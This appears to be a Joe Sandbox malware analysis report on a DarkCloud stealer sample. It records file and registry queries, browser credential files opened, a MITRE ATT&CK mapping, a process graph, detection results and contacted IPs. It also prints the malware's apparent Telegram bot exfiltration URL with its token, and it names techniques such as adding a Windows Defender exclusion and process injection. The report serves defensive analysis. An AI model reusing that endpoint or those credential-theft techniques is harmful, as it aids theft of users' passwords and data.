                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\BNAGMGSPLO.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\BNAGMGSPLO.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\BWETZDQDIB.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\BWETZDQDIB.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\BWETZDQDIB.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\BWETZDQDIB.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\EFOYFBOLXA.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\EFOYFBOLXA.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\GAOBCVIQIJ.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\GAOBCVIQIJ.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\GAOBCVIQIJ.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\GAOBCVIQIJ.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\IQXRGUNTFT.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\IQXRGUNTFT.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\QCFWYSKMHA.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\QCFWYSKMHA.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\QCFWYSKMHA.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\QCFWYSKMHA.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\QLSSZNHVJI.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\QLSSZNHVJI.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\QNCYCDFIJJ.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\QNCYCDFIJJ.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\QNCYCDFIJJ.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\SQSJKEBWDT.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\SQSJKEBWDT.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\SQSJKEBWDT.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\SQSJKEBWDT.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\SUAVTZKNFL.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\SUAVTZKNFL.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\SUAVTZKNFL.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\SUAVTZKNFL.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\VWDFPKGDUF.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\VWDFPKGDUF.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\VWDFPKGDUF.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\VWDFPKGDUF.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\WXDORXTPKQ.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\WXDORXTPKQ.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\ZGGKNSUKOP.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\ZGGKNSUKOP.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\ZGGKNSUKOP.xlsx VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\ZIPXYXWIOY.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\ZIPXYXWIOY.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\ZIPXYXWIOY.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\ZIPXYXWIOY.pdf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\ZQIXMVQGAH.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\ZQIXMVQGAH.docx VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exeQueries volume information: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files.zip VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files.zip VolumeInformation
                      Source: C:\Users\user\Desktop\DESCRIPTION.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected DarkCloud
                      Source: Yara matchFile source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DESCRIPTION.exe.3fe4798.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DESCRIPTION.exe.3db4ec0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DESCRIPTION.exe.3fe4798.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DESCRIPTION.exe.3db4ec0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DESCRIPTION.exe.3dfe800.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000002.1501721613.0000000003CF2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DESCRIPTION.exe PID: 180, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: OdoiXyuXnaQN.exe PID: 5348, type: MEMORYSTR
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
                      Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

                      Remote Access Functionality

                      barindex
                      Yara detected DarkCloud
                      Source: Yara matchFile source: 1.2.DESCRIPTION.exe.3dfe800.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DESCRIPTION.exe.3fe4798.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DESCRIPTION.exe.3db4ec0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DESCRIPTION.exe.3fe4798.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DESCRIPTION.exe.3db4ec0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DESCRIPTION.exe.3dfe800.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000002.1501721613.0000000003CF2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DESCRIPTION.exe PID: 180, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: OdoiXyuXnaQN.exe PID: 5348, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                      Windows Management Instrumentation                      		1
                      Scheduled Task/Job                      		112
                      Process Injection                      		1
                      Masquerading                      		1
                      OS Credential Dumping                      		1
                      Query Registry                      		Remote Services1
                      Archive Collected Data                      		1
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Scheduled Task/Job                      		1
                      DLL Side-Loading                      		1
                      Scheduled Task/Job                      		11
                      Disable or Modify Tools                      		LSASS Memory221
                      Security Software Discovery                      		Remote Desktop Protocol1
                      Data from Local System                      		1
                      Ingress Tool Transfer                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      DLL Side-Loading                      		51
                      Virtualization/Sandbox Evasion                      		Security Account Manager2
                      Process Discovery                      		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook112
                      Process Injection                      		NTDS51
                      Virtualization/Sandbox Evasion                      		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                      Obfuscated Files or Information                      		LSA Secrets1
                      Application Window Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                      Software Packing                      		Cached Domain Credentials2
                      File and Directory Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Timestomp                      		DCSync23
                      System Information Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      DLL Side-Loading                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 1591788 Sample: DESCRIPTION.exe Startdate: 15/01/2025 Architecture: WINDOWS Score: 100 53 Found malware configuration 2->53 55 Sigma detected: Scheduled temp file as task from temp location 2->55 57 Multi AV Scanner detection for submitted file 2->57 59 6 other signatures 2->59 7 DESCRIPTION.exe 7 2->7         started        11 OdoiXyuXnaQN.exe 2->11         started        process3 file4 41 C:\Users\user\AppData\...\OdoiXyuXnaQN.exe, PE32 7->41 dropped 43 C:\Users\...\OdoiXyuXnaQN.exe:Zone.Identifier, ASCII 7->43 dropped 45 C:\Users\user\AppData\Local\...\tmp9A10.tmp, XML 7->45 dropped 47 C:\Users\user\AppData\...\DESCRIPTION.exe.log, ASCII 7->47 dropped 61 Uses schtasks.exe or at.exe to add and modify task schedules 7->61 63 Adds a directory exclusion to Windows Defender 7->63 65 Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes) 7->65 67 Injects a PE file into a foreign processes 7->67 13 powershell.exe 23 7->13         started        16 powershell.exe 23 7->16         started        18 DESCRIPTION.exe 67 7->18         started        21 schtasks.exe 1 7->21         started        69 Multi AV Scanner detection for dropped file 11->69 71 Machine Learning detection for dropped file 11->71 73 Writes or reads registry keys via WMI 11->73 23 OdoiXyuXnaQN.exe 11->23         started        25 schtasks.exe 11->25         started        27 OdoiXyuXnaQN.exe 11->27         started        29 OdoiXyuXnaQN.exe 11->29         started        signatures5 process6 dnsIp7 75 Loading BitLocker PowerShell Module 13->75 31 conhost.exe 13->31         started        33 conhost.exe 16->33         started        49 149.154.167.220 TELEGRAMRU United Kingdom 18->49 51 162.55.60.2 ACPCA United States 18->51 35 conhost.exe 21->35         started        77 Tries to harvest and steal browser information (history, passwords, etc) 23->77 37 WmiPrvSE.exe 23->37         started        39 conhost.exe 25->39         started        signatures8 process9

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      DESCRIPTION.exe33%VirustotalBrowse
                      DESCRIPTION.exe32%ReversingLabs
                      DESCRIPTION.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe34%ReversingLabs

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://showip.net/0%Avira URL Cloudsafe
                      http://showip.net/#z0%Avira URL Cloudsafe
                      http://showip.net/)z0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://api.telegram.org/mplatesDESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://api.telegram.org/bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732OdoiXyuXnaQN.exe, 00000010.00000002.2720680009.0000000004383000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://api.telegram.org/botDESCRIPTION.exe, 00000001.00000002.1501721613.0000000003CF2000.00000004.00000800.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, OdoiXyuXnaQN.exe, 00000010.00000002.2715156422.0000000000409000.00000040.00000400.00020000.00000000.sdmpfalse
                            		high
                            https://api.telegram.org/bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=.BMPOdoiXyuXnaQN.exe, 00000010.00000002.2720228107.000000000427F000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://showip.net/#zOdoiXyuXnaQN.exe, 00000010.00000002.2715993099.00000000010D8000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://api.telegram.org/DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2719577553.0000000004207000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://api.telegram.org/SOdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://tempuri.org/DataSet1.xsdDESCRIPTION.exe, OdoiXyuXnaQN.exe.1.drfalse
                                    		high
                                    https://api.telegram.org/tOdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://showip.net/)zOdoiXyuXnaQN.exe, 00000010.00000002.2715993099.00000000010D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameDESCRIPTION.exe, 00000001.00000002.1500033277.00000000024B9000.00000004.00000800.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 0000000A.00000002.1557268789.0000000002AF9000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://showip.net/DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001138000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://api.telegram.org/BDESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          149.154.167.220
                                          		unknownUnited Kingdom
                                          		62041TELEGRAMRUfalse
                                          162.55.60.2
                                          		unknownUnited States
                                          		35893ACPCAfalse

                                          General Information

                                          Joe Sandbox version:42.0.0 Malachite
                                          Analysis ID:1591788
                                          Start date and time:2025-01-15 13:20:11 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 7m 28s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:23
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:DESCRIPTION.exe
                                          Detection:MAL
                                          Classification:mal100.troj.spyw.evad.winEXE@23/69@0/2
                                          EGA Information:
                                          • Successful, ratio: 75%
                                          HCA Information:
                                          • Successful, ratio: 97%
                                          • Number of executed functions: 147
                                          • Number of non-executed functions: 31
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe

                                          Warnings

                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                          • Execution Graph export aborted for target OdoiXyuXnaQN.exe, PID 5348 because it is empty
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size getting too big, too many NtCreateKey calls found.
                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                          • Report size getting too big, too many NtOpenFile calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Skipping network analysis since amount of network traffic is too extensive

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          07:21:17API Interceptor5917x Sleep call for process: DESCRIPTION.exe modified
                                          07:21:19API Interceptor34x Sleep call for process: powershell.exe modified
                                          07:21:22API Interceptor5789x Sleep call for process: OdoiXyuXnaQN.exe modified
